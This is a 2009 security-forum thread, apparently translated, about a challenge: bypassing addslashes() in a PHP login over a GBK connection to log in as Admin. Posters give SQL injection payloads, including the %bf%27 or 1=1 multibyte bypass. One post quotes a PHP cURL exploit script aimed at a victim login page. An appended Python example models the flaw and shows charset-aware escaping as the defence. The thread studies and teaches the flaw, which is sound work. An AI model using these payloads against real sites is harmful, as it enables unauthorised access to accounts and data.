Hertz Posted October 7, 2009

Given the source code of a page. What would be the ideal query for extracting the data / logging in as Admin?

```php
<?php
function asvsmysql_login($username, $password)
{
    // addslashes() escapes byte by byte; the connection charset set below is GBK
    $username = addslashes($username);
    $password = md5($password);
    $db = new Database();
    $db->setHost('localhost');
    $db->setDatabase(ADDSLASH_DATABASE);
    $db->setUser(ADDSLASH_USERNAME);
    $db->setPassword(ADDSLASH_PASSWORD);
    if (false === $db->connect()) {
        return htmlDisplayError('Conectare nereusita.');
    }
    $db->query("SET NAMES GBK");
    $db->query("SET CHARACTER SET GBK");
    // the escaped username is interpolated straight into the query string
    $query = "SELECT username FROM users WHERE username='$username' AND password='$password'";
    if (false === ($result = $db->queryFirst($query))) {
        return htmlDisplayError('User/Parola gresite..');
    }
    if ($result['username'] !== 'Admin') {
        return htmlDisplayError('Esti logat,dar nu ca Admin.');
    }
    return htmlDisplayMessage('Esti logat,felicitari!');
}
?>
```
ZeroCold Posted October 7, 2009

SELECT username FROM admin WHERE username='$username' AND password='$password' --??? (not sure) )...
Nytro Posted October 7, 2009 (edited)

username='$username' and password='$password' - Shouldn't you have used double quotes? And I don't see how the function could be called from the browser... Let's assume we use GET for username and password:

username=Admin
password=' OR 1=1'

Something like that. Login bypass.

Edit: It's not right, I didn't look at the beginning. Edited October 7, 2009 by Nytro
loki Posted October 7, 2009

Nice idea. It would be tempting to build a simple site with the code above... but I suppose finding the solution only requires reading the code?... I might get to it later (though I don't know if I have time today) to put the source and a database on a host and offer the site for attempts. I like the idea.

PS I think you meant ' OR 1 OR ' or ' OR 1=1 OR '
Hertz Posted October 7, 2009 (Author)

I'd put it up if I had somewhere to. Anyway. This challenge is about addslashes and nothing else.
michee Posted October 8, 2009

You use the fact that the charset is GBK and escaping is done with addslashes. Then I think you can inject blind.... at a first glance.
ZeroCold Posted October 8, 2009

SELECT username FROM users WHERE username=addslashes($username) AND password=addslashes(' OR 1=1 OR ') :D:D
Hertz Posted October 8, 2009 (Author)

LOL asdf
Nytro Posted October 8, 2009

$username = "Admin--" ?

Edit: No...
ioinel Posted October 8, 2009

Challenge: Addslashes
Nytro Posted October 8, 2009

But it didn't have to be made by him. It doesn't matter who made it.
michee Posted October 9, 2009

You go in like this: %bf%27 or 1=1 /** On the original site I get "you're logged in but not as Admin!"
ioinel Posted October 9, 2009

nytro, I know. I posted the site just so everyone can test there. Does anyone have a link to a tutorial on that vulnerability?
loki Posted October 9, 2009

I tried plenty. Indeed, the idea would be to end up with a query like

FROM users WHERE username='admin' OR 1 OR 'ceva' AND password='';

addslashes turns ' into \' and it seems the only viable method is using UTF8 characters (the site is in an Asian language so it accepts them, as michee said). The problem is that all my attempts failed; the program has to be tested separately, because by eye the slightest mistake behaves the same.
ioinel Posted October 9, 2009

I only found this, but I don't have time right now nor a host to put it on and try.

SQL Injection - Hakipedia

In rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set.

In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are construed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (') following a 0xbf (¿); ¿'.

This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) and is followed by a non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped.

Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection:

```php
<?php
$url = "http://www.victimsite.com/login.php";
$ref = "http://www.victimsite.com/index.php";
$session = "PHPSESSID=abcdefg01234567890abcdefg";
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $url );
curl_setopt( $ch, CURLOPT_REFERER, $ref );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE );
curl_setopt( $ch, CURLOPT_COOKIE, $session );
curl_setopt( $ch, CURLOPT_POST, TRUE );
curl_setopt( $ch, CURLOPT_POSTFIELDS, "username=" . chr(0xbf) . chr(0x27) . "OR 1=1/*&submit=1" );
$data = curl_exec( $ch );
print( $data );
curl_close( $ch );
?>
```

The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking.
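An added example in Python, not from this thread or from Hakipedia, modelling the byte-level behaviour the excerpt above describes and the charset-aware check a defender needs instead. It assumes the server decodes query bytes as GBK (Python's built-in "gbk" codec stands in for MySQL's handling); `addslashes`, `unescaped_quotes` and `charset_aware_escape` are names chosen here.

```python
# Added example (not the thread's own code). Models addslashes() on raw bytes,
# shows how a GBK-decoding server absorbs the inserted backslash into a two-byte
# character, and contrasts it with escaping done on the decoded characters.
# Assumption: the connection charset is GBK, as in the challenge's SET NAMES GBK.

ESCAPED = b"'\"\\\x00"   # bytes that PHP addslashes() prefixes with a backslash

def addslashes(data: bytes) -> bytes:
    """Byte-wise model of PHP addslashes(): it never looks at the charset."""
    out = bytearray()
    for b in data:
        if b in ESCAPED:
            out.append(0x5C)   # backslash lands between a lead byte and the quote
        out.append(b)
    return bytes(out)

def unescaped_quotes(escaped: bytes, charset: str = "gbk") -> int:
    """Decode the escaped bytes the way the server does and count single quotes
    not protected by a backslash. Any value > 0 means the escaping was defeated:
    0xBF 0x5C decodes to one GBK character, leaving the following ' bare."""
    text = escaped.decode(charset, errors="replace")
    count, prev_backslash = 0, False
    for ch in text:
        if ch == "'" and not prev_backslash:
            count += 1
        prev_backslash = (ch == "\\") and not prev_backslash
    return count

def charset_aware_escape(data: bytes, charset: str = "gbk") -> bytes:
    """Hardened variant: decode strictly first (0xBF followed by 0x27 is malformed
    GBK and is rejected), escape per character, then re-encode. This is what
    mysqli_real_escape_string() does once mysqli_set_charset() has told the client
    library the real connection charset; prepared statements remain preferable."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError as exc:
        raise ValueError("input is not well-formed in the connection charset") from exc
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset)

if __name__ == "__main__":
    # Constructed sample input: the %bf%27 prefix discussed in the thread.
    tainted = b"\xbf' OR 1=1/*"
    print(unescaped_quotes(addslashes(tainted)))   # 1 -> escaping defeated
    print(unescaped_quotes(addslashes(b"Admin'")))  # 0 -> plain ASCII is fine
    try:
        charset_aware_escape(tainted)
    except ValueError as e:
        print("rejected:", e)
```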